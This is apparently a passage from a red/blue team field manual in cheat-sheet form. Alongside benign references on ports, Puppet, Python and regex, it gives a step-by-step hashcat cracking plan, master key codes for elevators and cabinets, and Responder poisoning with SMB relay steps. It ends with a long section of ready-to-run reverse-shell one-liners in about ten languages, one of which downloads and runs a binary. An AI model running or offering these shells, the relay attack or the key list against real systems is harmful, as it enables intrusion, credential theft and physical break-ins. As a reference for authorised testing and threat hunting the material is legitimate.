This is only meant as a basic guide to processing hashes and each
scenario will obviously be unique based on external circumstances.
For this attack plan assume the password hashes are raw MD5 and
some plain text user passwords were captured. If plain text
passwords were not captured, we would most likely skip to
DICTIONARY/WORDLIST attacks. Lastly, since MD5 is a “Fast” hash we
can be more liberal with our attack plan.

1-CUSTOM WORDLIST
First compile your known plain text passwords into a custom
wordlist file. Pass this to your tool of choice as a straight
dictionary attack.
hashcat -a 0 -m 0 -w 4 [Link] custom_list.txt

2-CUSTOM WORDLIST + RULES

Run your custom wordlist with permutation rules to crack slight
variations.
hashcat -a 0 -m 0 -w 4 [Link] custom_list.txt -r [Link] --
loopback

3-DICTIONARY/WORDLIST
Perform a broad dictionary attack, looking for common passwords and
leaked passwords in well-known dictionaries/wordlists.
hashcat -a 0 -m 0 -w 4 [Link] [Link]

4-DICTIONARY/WORDLIST + RULES
Add rule permutations to the broad dictionary attack, looking for
subtle changes to common words/phrases and leaked passwords.
hashcat -a 0 -m 0 -w 4 [Link] [Link] -r [Link] --loopback

5-CUSTOM WORDLIST + RULES

Add any newly discovered passwords to your custom wordlist and run
an attack again with permutation rules; looking for any other
subtle variations.
awk -F “:” ‘{print $2}’ [Link] >> custom_list.txt
hashcat -a 0 -m 0 -w 4 [Link] custom_list.txt -r [Link] --
loopback

6-MASK
Now we will use mask attacks included with Hashcat to search the
keyspace for common password lengths and patterns, based on the
RockYou dataset.
hashcat -a 3 -m 0 -w 4 [Link] [Link]

7-HYBRID DICTIONARY + MASK

249
Using a dictionary of your choice, conduct hybrid attacks looking
for larger variations of common words or known passwords by
appending/prepending masks to those candidates.
hashcat -a 6 -m 0 -w 4 [Link] [Link] [Link]
hashcat -a 7 -m 0 -w 4 [Link] [Link] [Link]

8-CUSTOM WORDLIST + RULES

Add any newly discovered passwords back to your custom wordlist and
run an attack again with permutation rules; looking for any other
subtle variations.
awk -F “:” ‘{print $2}’ [Link] >> custom_list.txt
hashcat -a 0 -m 0 -w 4 [Link] custom_list.txt -r [Link] --
loopback

9-COMBO
Using a dictionary of your choice, perform a combo attack by
individually combining the dictionary’s password candidates
together to form new candidates.
hashcat -a 1 -m 0 -w 4 [Link] [Link] [Link]

10-CUSTOM HYBRID ATTACK

Add any newly discovered passwords back to your custom wordlist and
perform a hybrid attack against those new acquired passwords.
awk -F “:” ‘{print $2}’ [Link] >> custom_list.txt
hashcat -a 6 -m 0 -w 4 [Link] custom_list.txt [Link]
hashcat -a 7 -m 0 -w 4 [Link] [Link] custom_list.txt

11-CUSTOM MASK ATTACK

By now the easier, weaker passwords may have fallen to cracking,
but still some remain. Using PACK (on pg.51) create custom mask
attacks based on your currently cracked passwords. Be sure to sort
out masks that match the previous [Link] list.
hashcat -a 3 -m 0 -w 4 [Link] custom_masks.hcmask

12-BRUTE-FORCE
When all else fails begin a standard brute-force attack, being
selective as to how large a keyspace your rig can adequately brute-
force. Above 8 characters is usually pointless due to hardware
limitations and password entropy/complexity.
hashcat -a 3 -m 0 -w 4 [Link] -i ?a?a?a?a?a?a?a?a

P P
PHYSICAL ENTRY_Keys
RED TEAM PHYSICAL N/A
Common master keys for physical security locks.

250
ELEVATOR MASTER KEYS
KEY ELEVATOR DESCRIPTION
This is the most common and
FEO-K1 Universal universal key for Fire Service
Common Fire Service key,
sometimes used on Schindler
EPCO1/EN1 Universal elevators
Fire Service master key for
Yale 3502 New York every elevator in New York
Old Fire Service master key for
Yale 2642 New York every elevator in New York
Opens the panels for OTIS
BGM30 OTIS elevators
Fire Service master key for
UTF OTIS OTIS elevators
Independent Service, fan,
light, cabinet for OTIS
UTA OTIS elevators
Floor lockout, inspection,
UTH OTIS access for OTIS elevators
Fire Service master key for
501CH Schindler Schindler elevators
Independent Service, fan,
light, cabinet for Monitor
J200 Monitor/Janus fixtures
Fire Service master key for
J217 Monitor/Janus Monitor fixtures
Independent Service, fan,
light, cabinet for Innovation
EX513 Innovation elevators
Fire Service master key for
EX515 Innovation Innovation elevators
Fire Service master key for
KONE3 KONE KONE elevators

Available:
[Link]
[Link]
[Link]
[Link]

COMMON KEYS
KEY DESCRIPTION
Linear 222343 Master key for Linear intercom system

251
 DoorKing 16120 Master key for DoorKing intercom system
CH751 Extremely common cabinet key
C415A Extremely Common cabinet key
C413A Common cabinet key
C420A Common cabinet key
C642A Common cabinet key
C346A Common cabinet key
C390A Common cabinet key
EK333 Common server cabinet key
Ilco CC1 Common golf cart key

REFERENCE:
[Link]
[Link]
[Link]

P P
PORTS_Top1000
ALL INFORMATIONAL ALL
Top 1000 most common ports/services.

Port Service Port Service

7 tcp echo 1022 udp exp2
7 udp echo 1025 tcp NFS/IIS
9 tcp discard 1025 udp blackjack
9 udp discard 1026 tcp LSA/nterm
13 tcp daytime 1026 udp win-rpc
17 udp qotd 1027 tcp IIS
19 udp chargen 1028 udp ms-lsa
21 tcp ftp 1029 tcp ms-lsa
22 tcp ssh 1029 udp solid-mux
23 tcp telnet 1030 udp iad1
25 tcp smtp 1110 tcp nfsd-status
26 tcp rsftp 1433 tcp ms-sql-s
37 tcp time 1433 udp ms-sql-s
49 udp tacacs 1434 udp ms-sql-m
53 tcp dns 1645 udp radius
53 udp dns 1646 udp radacct
67 udp dhcps 1701 udp L2TP
68 udp dhcpc 1718 udp h225gatedisc
69 udp tftp 1719 udp h323gatestat
79 tcp finger 1720 tcp h323q931
80 tcp http 1723 tcp pptp
80 udp http 1755 tcp wms
81 tcp hosts2-ns 1812 udp radius

252
88 tcp kerberos-sec 1813 udp radacct
88 udp kerberos-sec 1900 tcp upnp
106 tcp pop3pw 1900 udp upnp
110 tcp pop3 2000 tcp cisco-sccp
111 tcp rpcbind 2000 udp cisco-sccp
111 udp rpcbind 2001 tcp dc
113 tcp ident 2048 udp dls-monitor
119 tcp nntp 2049 tcp nfs
120 udp cfdptkt 2049 udp nfs
123 udp ntp 2121 tcp ccproxy-ftp
135 tcp msrpc 2222 udp msantipiracy
135 udp msrpc 2223 udp rockwell-csp2
136 udp profile 2717 tcp pn-requester
137 udp netbios-ns 3000 tcp ppp
138 udp netbios-dgm 3128 tcp squid-http
139 tcp netbios-ssn 3283 udp netassistant
139 udp netbios-ssn 3306 tcp mysql
143 tcp imap 3389 tcp ms-wbt-server
144 tcp news 3456 udp IISrpc/vat
158 udp pcmail-srv 3703 udp adobeserver-3
161 udp snmp 3986 tcp mapper-ws_ethd
162 udp snmptrap 4444 udp krb524
177 udp xdmcp 4500 udp nat-t-ike
179 tcp bgp 4899 tcp radmin
199 tcp smux 5000 tcp upnp
389 tcp ldap 5000 udp upnp
427 tcp svrloc 5009 tcp airport-admin
427 udp svrloc 5051 tcp ida-agent
443 tcp https 5060 tcp sip
443 udp https 5060 udp sip
444 tcp snpp 5101 tcp admdog
445 tcp microsoft-ds 5190 tcp aol
445 udp microsoft-ds 5353 udp zeroconf
465 tcp smtps 5357 tcp wsdapi
497 udp retrospect 5432 tcp postgresql
500 udp isakmp 5631 tcp pcanywheredata
513 tcp login 5632 udp pcanywherestat
514 tcp shell 5666 tcp nrpe
514 udp syslog 5800 tcp vnc-http
515 tcp printer 5900 tcp vnc
515 udp printer 6000 tcp X11
518 udp ntalk 6001 tcp X11-1
520 udp route 7070 tcp realserver
543 tcp klogin 8000 tcp alt-http
544 tcp kshell 8008 tcp http
548 tcp afp 8009 tcp ajp13
554 tcp rtsp 8080 tcp http-proxy
587 tcp message sub 8081 tcp blackice-icecap

253
 593 udp rpc-epmap 8443 tcp alt-https
623 udp asf-rmcp 8888 tcp sun-answerbook
626 udp serialnumberd 8888 tcp sun-answerbook
631 tcp ipp 9100 tcp jetdirect
631 udp ipp 9200 udp wap-wsp
646 tcp ldp 9999 tcp abyss
873 tcp rsync 10000 udp ndmp
990 tcp ftps 10000 tcp snet-sensor-mgmt
993 tcp imaps 17185 udp wdbrpc
995 tcp pop3s 20031 udp bakbonenetvault
996 udp vsinet 31337 udp BackOrifice
997 udp maitrd 32768 tcp filenet-tms
998 udp puparp 32768 udp omad
999 udp applix 32769 udp filenet-rpc

P P
PORTS_ICS/SCADA
ALL INFORMATIONAL ALL
Ports for common ICS/SCADA hardware.

Port Protocol Vendor

502 TCP Modbus TCP
1089 TCP:UDP Foundation Fieldbus HSE
1090 TCP:UDP Foundation Fieldbus HSE
1091 TCP:UDP Foundation Fieldbus HSE
1541 TCP:UDP Foxboro/Invensys Foxboro DCS Informix
2222 UDP EtherNet/IP
3480 TCP OPC UA Discovery Server
4000 TCP:UDP Emerson/Fisher ROC Plus
5050-5051 UDP Telvent OASyS DNA
5052 TCP Telvent OASyS DNA
5065 TCP Telvent OASyS DNA
5450 TCP OSIsoft PI Server
10307 TCP ABB Ranger 2003
10311 TCP ABB Ranger 2003
10364-10365 TCP ABB Ranger 2003
10407 TCP ABB Ranger 2003
10409-10410 TCP ABB Ranger 2003
10412 TCP ABB Ranger 2003
10414-10415 TCP ABB Ranger 2003
10428 TCP ABB Ranger 2003
10431-10432 TCP ABB Ranger 2003
10447 TCP ABB Ranger 2003
10449-10450 TCP ABB Ranger 2003
12316 TCP ABB Ranger 2003
12645 TCP ABB Ranger 2003

254
12647-12648 TCP ABB Ranger 2003
13722 TCP ABB Ranger 2003
11001 TCP:UDP Johnson Controls Metasys N1
12135-12137 TCP Telvent OASyS DNA
13724 TCP ABB Ranger 2003
13782-13783 TCP ABB Ranger 2003
18000 TCP Iconic Genesis32 GenBroker (TCP)
20000 TCP:UDP DNP3
34962 TCP:UDP PROFINET
34963 TCP:UDP PROFINET
34964 TCP:UDP PROFINET
34980 UDP EtherCAT
38589 TCP ABB Ranger 2003
38593 TCP ABB Ranger 2003
38000-38001 TCP SNC GENe
38011-38012 TCP SNC GENe
38014-38015 TCP SNC GENe
38200 TCP SNC GENe
38210 TCP SNC GENe
38301 TCP SNC GENe
38400 TCP SNC GENe
38600 TCP ABB Ranger 2003
38700 TCP SNC GENe
38971 TCP ABB Ranger 2003
39129 TCP ABB Ranger 2003
39278 TCP ABB Ranger 2003
44818 TCP:UDP EtherNet/IP
45678 TCP:UDP Foxboro/Invensys Foxboro DCS AIMAPI
47808 UDP BACnet/IP
50001-50016 TCP Siemens Spectrum Power TG
50018-50020 TCP Siemens Spectrum Power TG
50020-50021 UDP Siemens Spectrum Power TG
50025-50028 TCP Siemens Spectrum Power TG
50110-50111 TCP Siemens Spectrum Power TG
55000-55002 UDP FL-net Reception
55003 UDP FL-net Transmission
55555 TCP:UDP Foxboor/Invensys Foxboro DCS FoxAPI
56001-56099 TCP Telvent OASyS DNA
62900 TCP SNC GENe
62911 TCP SNC GENe
62924 TCP SNC GENe
62930 TCP SNC GENe
62938 TCP SNC GENe
62956-62957 TCP SNC GENe
62963 TCP SNC GENe
62981-62982 TCP SNC GENe
62985 TCP SNC GENe
62992 TCP SNC GENe

255
 63012 TCP SNC GENe
63027-63036 TCP SNC GENe
63041 TCP SNC GENe
63075 TCP SNC GENe
63079 TCP SNC GENe
63082 TCP SNC GENe
63088 TCP SNC GENe
63094 TCP SNC GENe
65443 TCP SNC GENe

P P
PORTS_Malware C2
BLUE TEAM THREAT HUNT ALL
Ports malware/C2 have been observed communicating.

Port Actor/Family
Blade Runner Doly Trojan Fore
21 Invisible FTP WebEx WinCrash
23 Tiny Telnet Server
Antigen Email Password Sender Haebu
Coceda Shtrilitz Stealth Terminator
25 WinPC WinSpy Kuang2.0
31 Hackers Paradise
80 Executor
127 TYPEFRAME
456 Hackers Paradise
465 Zebrocy
555 Ini-Killer Phase Zero Stealth Spy
587 AgentTesla
587 Cannon
666 Satanz Backdoor
995 RedLeaves
1001 Silencer WebEx
1011 Doly Trojan
1058 Bankshot
1170 Psyber Stream Server Voice
1234 Ultors Trojan
1243 SubSeven 1.0 – 1.8
1245 VooDoo Doll
1349 Back Ofrice DLL
1492 FTP99CMP
1600 Shivka-Burka
1807 SpySender
1981 Shockrave
1999 BackDoor 1.00-1.03
2001 Trojan Cow
2023 Ripper

256
2115 Bugs
2140 Deep Throat The Invasor
2801 Phineas Phucker
3024 WinCrash
3129 Masters Paradise
3150 Deep Throat The Invasor
3333 RevengeRAT
3700 Portal of Doom
3728 MobileOrder
4092 WinCrash
4567 File Nail 1
4590 ICQTrojan
5000 Bubbel
5001 Sockets de Troie
5321 Firehotcker
5400 Blade Runner 0.80 Alpha
5400 Blade Runner
5401 Blade Runner 0.80 Alpha
5401 Blade Runner
5402 Blade Runner 0.80 Alpha
5402 Blade Runner
5569 Robo-Hack
5742 WinCrash
6666 GorgonGroup
6670 DeepThroat
6771 DeepThroat
6969 GateCrasher Priority
7000 Remote Grab
7300 NetMonitor
7301 NetMonitor
7306 NetMonitor
7307 NetMonitor
7308 NetMonitor
7789 ICKiller
8088 Volgmer
8787 BackOfrice 2000
9872 Portal of Doom
9873 Portal of Doom
9874 Portal of Doom
9875 Portal of Doom
9989 iNi-Killer
10067 Portal of Doom
10167 Portal of Doom
10607 Coma 1.0.9
11000 Senna Spy
11223 Progenic trojan
12223 Hack´99 KeyLogger
12345 GabanBus NetBus

257
12346 GabanBus NetBus
12361 Whack-a-mole
12362 Whack-a-mole
13000 Remsec
14146 APT32
16969 Priority
20001 Millennium
20034 NetBus 2.0 Beta-NetBus 2.01
21544 GirlFriend 1.0 Beta-1.35
22222 Prosiak
23456 Evil FTP Ugly FTP
26274 Delta
30100 NetSphere 1.27a
30101 NetSphere 1.27a
30102 NetSphere 1.27a
31337 Back Orifice
31337 BackOfrice 1.20
31338 Back Orifice DeepBO
31338 DeepBO
31339 NetSpy DK
31666 BOWhack
33333 Prosiak
34324 BigGluck TN
40412 The Spy
40421 Masters Paradise
40422 Masters Paradise
40423 Masters Paradise
40426 Masters Paradise
46769 GravityRAT
47262 Delta
50505 Sockets de Troie
50766 Fore
53001 Remote Windows Shutdown
54321 SchoolBus .69-1.11
54321 BackOfrice 2000
61061 HiddenWasp
61466 Telecommando
65000 Devil
1177:8282 njRAT
1913:81 APT3
1985:1986 ZxShell
2280:1339 CoinTicker
4443:3543 MagicHound
[Link] [Link]
[Link] TrickBot
52100:5876 InnaputRAT
6666:4782 NanoCore
6868:7777 PoisonIvy

258
 7080:50000 Emotet
8060:8888 POWERSTATS
808:880 APT33
[Link] Group5
[Link] LazarusGroup

REFERENCE:
[Link]
[Link]
[Link]

P P
PUPPET
RED/BLUE TEAM ADMINISTRATION DEVOPS
Puppet is an open source software configuration management and
deployment tool.

Managing Puppet Services:

start puppet server
service puppetserver start service
enable puppet server
chkconfig puppetserver on service on boot
service start puppet start puppet agent service
enable puppet agent
chkconfig puppet on service on boot
Managing Certificates (Master):
lists available nodes to
puppet cert list sign
puppet cert list --all lists all signed nodes
manually sign specific
puppet cert sign <name> node
puppet cert sign --all sign all nodes
puppet cert clean <name> removes cert
Managing Nodes (Master):
puppet node clean <name> removes node + cert
Managing Modules (Master):
lists current installed
puppet module list modules
downloads/installs modules
from
[Link]
puppet module install <name> m
puppet module uninstall <name> removes/deletes module
upgrades to new version of
puppet module upgrade <name> module

259
 search modules from
[Link]
puppet module search <name> m
Managing Puppet Agent Master/Node:
puppet agent --test run puppet agent on demand
puppet agent --disable disabled puppet agent
puppet agent --enable enable puppet agent
print location of puppet
puppet agent --configprint config agent configuration file
see what puppet is going
to change without making
puppet agent -t --noop the changes
see what puppet is going
puppet agent -t --noop to change for a paticular
/path/to/[Link] module
puppet agent --configprint
runinterval check runtime interval
Configuring Puppet
Setup Auto Cert Sign on Puppet
Master (Master):
vi
/etc/puppetlabs/puppet/[Link]
f
your domain name
*.<DOMAIN> "[Link]"
Changing Puppet Agent Run Interval
(Master/Node):
vi
/etc/puppetlabs/puppet/[Link]
[agent]
default is every 30minutes
runinterval = 1800 (1800 seconds)
Changing Puppet Agent
Environment(Master/Node):
vi
/etc/puppetlabs/puppet/[Link]
[main]
environment = <ENVIRONMENT> default is "production"
Changing Puppet Agent Default
Puppet Master Server(Master/Node):
vi
/etc/puppetlabs/puppet/[Link]
[main]
server = <PUPPET_SERVER> default is "puppet"
Troubleshooting
Connection To The Puppet Master:
make sure puppet master is
ping <IP> reachable via IP first

260
 make sure short domain
name can reach the puppet
ping puppet master
makesure FQDN can reach
ping [Link] the puppet master
check that both FQDN /
Short Domain name are
vi /etc/hosts entered on client side DNS
if using DNS Server Side
then check if you can
reach the nameservers +
nslookup [Link] name
if using DNS Server Side
check dns configuration is
vi /etc/[Link] correct
restart connection check
service network restart if any errors
if using a custom puppet
server check config to see
vi if configured correctly to
/etc/puppetlabs/puppet/[Link] non default server
test connection to puppet
telnet [Link] 8140 server for port 8140
if time is out of sync
get it in sync with the
date -R puppet master
SSL Regeneration:
puppet cert clean [Link] clean node (Master)
rm -rf $(puppet agent --configprint remove SSL certificate
ssldir) (Node)
puppet agent --test run puppet agent (Node)

REFERENCE:
[Link]

P P
PYTHON
ALL INFORMATONAL N/A

#Basic Script Template

#!/usr/bin/env python3
#
# Usage: .py
#

from collections import namedtuple

from dataclasses import make_dataclass

261
from enum import Enum
from sys import argv
import re

def main():
pass

###
## UTIL
#

def read_file(filename):
with open(filename, encoding='utf-8') as file:
return [Link]()

if __name__ == '__main__':
main()

File Operations
#Read a file line by line into a list. If you want the \n included:
with open(fname) as f:
content = [Link]()

#If you do not want 'new lines' included:

with open(fname) as f:
content = [Link]().splitlines()

Move file to the dist_dir folder

[Link](<filname>, dist_dir + [Link] + <filename>)

Get working directory

PWD = [Link]()

Write file
RESOURCE = "[Link]"
fd = open(RESOURCE, 'w')
[Link]("first line\n")
[Link]()

Parsing Arguments
parser = [Link]()

parser.add_argument("-p", dest="payload", help=payloads,

required=True)
parser.add_argument("-i", dest="interface", help="use interface -
default: eth0", default="eth0")

262
args = parser.parse_args()

payload_type = [Link]

REFERENCE:
[Link]
[Link]
[Link]
sheets/blob/master/docs/[Link]
[Link]
[Link]

R
R R
REGEX
ALL INFORMATIONAL N/A

ANCHOR DESCRIP EXAMPLE VALID INVALID

start of
string
^ or line ^foam foam bath foam
start of
string
in any
match
\A mode \Afoam foam bath foam
end of
string
$ or line finish$ finish finnish

263
 end of
string,
or char
before
last new
line in
any
match
\Z mode finish\Z finish finnish
end of
string,
in any
match
\z mode.
end of
the
previous
match or
the
start of
the
string
for the
first ^(get|set)|\G\
\G match w+$ setValue seValue
word
boundary
;
position
between
a word
characte
r (\w), This
and a island This
nonword is island
characte beautifu isn't
\b r (\W) \bis\b l beautiful
not-
word-
boundary
\B . \Bland island peninsula
ASSERTION DESCRIP EXAMPLE VALID INVALID
positive
lookahea question
(?=...) d question(?=s) s question
negative
lookahea
(?!...) d answer(?!s) answer answers
positive
look- applicati
(?<=...) behind (?<=appl)e apple on

264
 negative
look-
(?<!...) behind (?<!goo)d mood good
CHAR CLASS DESCRIP EXAMPLE VALID INVALID
class
definiti
[ ] on [axf] a, x, f b
class
definiti
[ - ] on range [a-c] a, b, c d
escape
inside
[ \ ] class [a-f.] a, b, . g
Not in
[^ ] class [^abc] d, e a
POSIX
[:class:] class [:alpha:] string 0101
match
any
chars
except battle,
. new line [Link] bottle bttle
white
space,
[\n\r\f\ good [Link]
\s t ] good\smorning morning ing
no-white
space,
[^\n\r\f goodmorn good
\S \t] good\Smorning ing morning
\d digit \d{2} 23 1a
non-
\D digit \D{3} foo, bar fo1
word,
[a-z-A-
\w Z0-9_] \w{4} v411 v4.1
non
word,
[^a-z-A-
\W Z0-9_] .$%? .$%? .ab?
SEQUENCE DESCRIP EXAMPLE VALID INVALID
alternat apple,
| ion apple|orange orange melon
footer
subpatte or
( ) rn foot(er|ball) footbal footpath
subpatte
rn, and
capture (?P<greeting>h
(?P<name>...) submatch ello) hello hallo

265
 into
name
subpatte
rn, but
does not
capture
(?:...) submatch (?:hello) hello hallo
one or
more
quantifi yeah,
+ er ye+ah yeeeah yah
zero or
more yeeah,
quantifi yeeeah,
* er ye*ah yah yeh
zero or
one
quantifi
? er yes? yes, ye yess
zero or
one, as
few
times as
possible
?? (lazy) yea??h yeah yeaah
<P>foo</
P>
one or matches
more only <P>
+? lazy /<.+?>/g and </P>
zero or
more,
*? lazy /<.*?>/g <html>
n times
{n} exactly fo{2} foo fooo
from n
to m good,goo
{n,m} times go{2,3}d od gooood
at least goo,
{n,} n times go{2,} gooo go
(?(condition).. if-then
.) pattern (<)?[p](?(1)>) <p>, p <p
if-then-
(?(condition).. else question,
.|...) pattern `^(?(?=q)que ans)` answer

SPECIAL CHAR DESCRIPTION

|general escape
\n new line
\r carriage return

266
 \t tab
\v vertical tab
\f form feed
\a alarm
[\b] backspace
\e escape
\cchar Ctrl + char(ie:\cc is Ctrl+c)
\ooo three digit octal (ie: \123)
one or two digit hexadecimal (ie:
\xhh \x10)
\x{hex} any hexadecimal code (ie: \x{1234})
char with unicode property (ie:
\p{xx} \p{Arabic}
\P{xx} char without unicode property
PATTERN MOD DESCRIPTION
g global match
case-insensitiv, match both
i uppercase and lowercase
m multiple lines
s single line (by default)
x ingore whitespace allows comments
anchored, the pattern is forced to
A ^
dollar end only, a dollar
metacharacter matches only at the
D end
extra analysis performed, useful
S for non-anchored patterns
ungreedy, greedy patterns becomes
U lazy by default
additional functionality of PCRE
X (PCRE extra)
allow duplicate names for
J subpatterns
unicode, pattern and subject
u strings are treated as UTF-8

REFERENCE:
[Link]
[Link]

R R
RESPONDER
RED TEAM ESCALATE PRIV ALL
Responder is an LLMNR, NBT-NS and MDNS poisoner and will answer to
specific NBT-NS queries on the network based on their name suffix.

267
Responder listens on ports: UDP 53,137,138,389,1434 TCP
21,25,80,110,139,389,445,587,1433,3128,3141 and Multicast UDP 5553.

python [Link] -I <interface>

EXAMPLE HASHES
(NTLMv1 SSP Enabled Hash Example)
hashcat::admin-
5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905
962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788

(NTLMv1 No-SSP Hash Example)

hashcat::admin-
5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E
35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

(NTLMv2 Hash Example)

admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6
:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e000000
0052920b85f78d013c31cdb3b92f5d765c783030

[Link] – location for modifying various Responder

configuration settings

Target a specific IP address on the network and limit possible

network disruptions edit:
[Link] file value “RespondTo”
Add the range 10.X.X.1-10 or host 10.X.X.2 you.

Target a particular NBTS-NS/LLMNR name edit:

[Link] file value “RespondToName” to a targeted spoof
hostname e.g, SQLSERVER-01, FILESHARE02,…

Use analyze mode ‘–A’ when trying to gauge how noisy the target IP
space may be in order to watch requests:

python [Link] -I <interface> -A

MULTI-RELAY w/ RESPONDER
STEP 1: Disable HTTP & SMB servers by editing the [Link]
file.

STEP 2: [Link] to check if host has SMB Signing: False

[Link] is located in the tools directory. this script allows
you to verify if SMB Signing: False. SMB Signing being disabled is
crucial for this relay attack, otherwise the target for relaying
isn’t vulnerable to this attack.
python [Link] –i 10.X.X.0/24

268
STEP 3: Start [Link]
python [Link] –I <interface>

STEP 4: Start Mult-Relay tool to route captured hashes to our

Target IP. Caveat is that the user “-u” target must be a local
administrator on the host.
python [Link] –t <Target IP> -u ALL

**MacOS/ OSX Responder must be started with an IP address for the -

i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX
for custom interface binding. Using -i en1 will not work.
Be sure to run the following commands as root to unload these
possible running services and limit conflicts:

launchctl unload
/System/Library/LaunchDaemons/[Link]
launchctl unload
/System/Library/LaunchDaemons/[Link]
launchctl unload /System/Library/LaunchDaemons/[Link]
launchctl unload
/System/Library/LaunchDaemons/[Link]

REFERENCE:
[Link]

R R
REVERSE SHELLS
RED TEAM C2 WINDOWS/LINUX/MacOS
Various methods to establish a reverse shell on target host.

AWK
awk 'BEGIN {s = "/inet/tcp/0/[Link]/4242"; while(42) { do{ printf
"shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0)
print $0 |& s; close(c); } } while(c != "exit") close(s); }}'
/dev/null

BASH TCP
bash -i >& /dev/tcp/[Link]/4242 0>&1

0<&196;exec 196<>/dev/tcp/[Link]/4242; sh <&196 >&196 2>&196

BASH UDP
Victim:
sh -i >& /dev/udp/[Link]/4242 0>&1
Listener:

269
nc -u -lvp 4242

SOCAT
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -
li',pty,stderr,setsid,sigint,sane tcp:[Link]:4242

user@victim$ wget -q [Link]

binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat;
chmod +x /tmp/socat; /tmp/socat exec:'bash -
li',pty,stderr,setsid,sigint,sane tcp:[Link]:4242

PERL
perl -e 'use
Socket;$i="[Link]";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotob
yname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STD
IN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -
i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new

IO::Socket::INET(PeerAddr,"[Link]:4242");STDIN->fdopen($c,r);$~-
>fdopen($c,w);system$_ while<>;'

**Windows ONLY
perl -MIO -e '$c=new
IO::Socket::INET(PeerAddr,"[Link]:4242");STDIN->fdopen($c,r);$~-
>fdopen($c,w);system$_ while<>;'

PYTHON
**Linux ONLY

IPv4
export RHOST="[Link]";export RPORT=4242;python -c 'import
sys,socket,os,pty;s=[Link]();[Link](([Link]("RHOST"),i
nt([Link]("RPORT"))));[os.dup2([Link](),fd) for fd in
(0,1,2)];[Link]("/bin/sh")'

IPv4
python -c 'import
socket,subprocess,os;s=[Link](socket.AF_INET,socket.SOCK_STR
EAM);[Link](("[Link]",4242));os.dup2([Link](),0);
os.dup2([Link](),1);os.dup2([Link](),2);import pty;
[Link]("/bin/bash")'

IPv6
python -c 'import
socket,subprocess,os,pty;s=[Link](socket.AF_INET6,[Link]

270
K_STREAM);[Link](("[Link]",4242,0,2));os.dup2([Link]
o(),0); os.dup2([Link](),1);
os.dup2([Link](),2);p=[Link]("/bin/sh");'

python -c 'import
socket,subprocess,os;s=[Link](socket.AF_INET,socket.SOCK_STR
EAM);[Link](("[Link]",4242));os.dup2([Link](),0);
os.dup2([Link](),1);
os.dup2([Link](),2);p=[Link](["/bin/sh","-i"]);'

**Windows ONLY
C:\Python27\[Link] -c "(lambda __y, __g, __contextlib:
[[[[[[[([Link](('[Link]', 4242)), [[[(s2p_thread.start(),
[[(p2s_thread.start(), (lambda __out: (lambda __ctx:
[__ctx.__enter__(), __ctx.__exit__(None, None, None),
__out[0](lambda: None)][2])(__contextlib.nested(type('except', (),
{'__enter__': lambda self: None, '__exit__': lambda __self,
__exctype, __value, __traceback: __exctype is not None and
(issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in
[(([Link](), lambda after: after())[1])]][0])})(), type('try', (),
{'__enter__': lambda self: None, '__exit__': lambda __self,
__exctype, __value, __traceback: [False for __out[0] in
[(([Link](), (lambda __after:
__after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in
[(True)]][0] for __g['p2s_thread'] in
[([Link](target=p2s, args=[s, p]))]][0])[1] for
s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in
[([Link](target=s2p, args=[s, p]))]][0] for __g['p'] in
[([Link](['\\windows\\system32\\[Link]'],
stdout=[Link], stderr=[Link],
stdin=[Link]))]][0])[1] for __g['s'] in
[([Link](socket.AF_INET, socket.SOCK_STREAM))]][0] for
__g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda
__after: __y(lambda __this: lambda:
(__l['s'].send(__l['p'].[Link](1)), __this())[1] if True else
__after())())(lambda: None) for __l['s'], __l['p'] in [(s,
p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda
s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda:
[(lambda __after: (__l['p'].[Link](__l['data']), __after())[1]
if (len(__l['data']) > 0) else __after())(lambda: __this()) for
__l['data'] in [(__l['s'].recv(1024))]][0] if True else
__after())())(lambda: None) for __l['s'], __l['p'] in [(s,
p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g,
__g))]][0] for __g['socket'] in [(__import__('socket', __g,
__g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g,
__g))]][0] for __g['threading'] in [(__import__('threading', __g,
__g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda:
y(y)()))), globals(), __import__('contextlib'))"

PHP

271
php -r '$sock=fsockopen("[Link]",4242);exec("/bin/sh -i <&3 >&3
2>&3");'

php -r '$sock=fsockopen("[Link]",4242);$proc=proc_open("/bin/sh -
i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

RUBY
ruby -rsocket -e'f=[Link]("[Link]",4242).to_i;exec
sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if

fork;c=[Link]("[Link]","4242");while(cmd=[Link]);[Link](
cmd,"r"){|io|[Link] [Link]}end'

**Windows ONLY
ruby -rsocket -e
'c=[Link]("[Link]","4242");while(cmd=[Link]);[Link](cmd,
"r"){|io|[Link] [Link]}end'

GOLANG
echo 'package main;import"os/exec";import"net";func
main(){c,_:=[Link]("tcp","[Link]:4242");cmd:=[Link]("/bin
/sh");[Link]=c;[Link]=c;[Link]=c;[Link]()}' > /tmp/[Link]
&& go run /tmp/[Link] && rm /tmp/[Link]

NETCAT Traditional
nc -e /bin/sh [Link] 4242
nc -e /bin/bash [Link] 4242
nc -c bash [Link] 4242

NETCAT OpenBsd
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Link] 4242
>/tmp/f

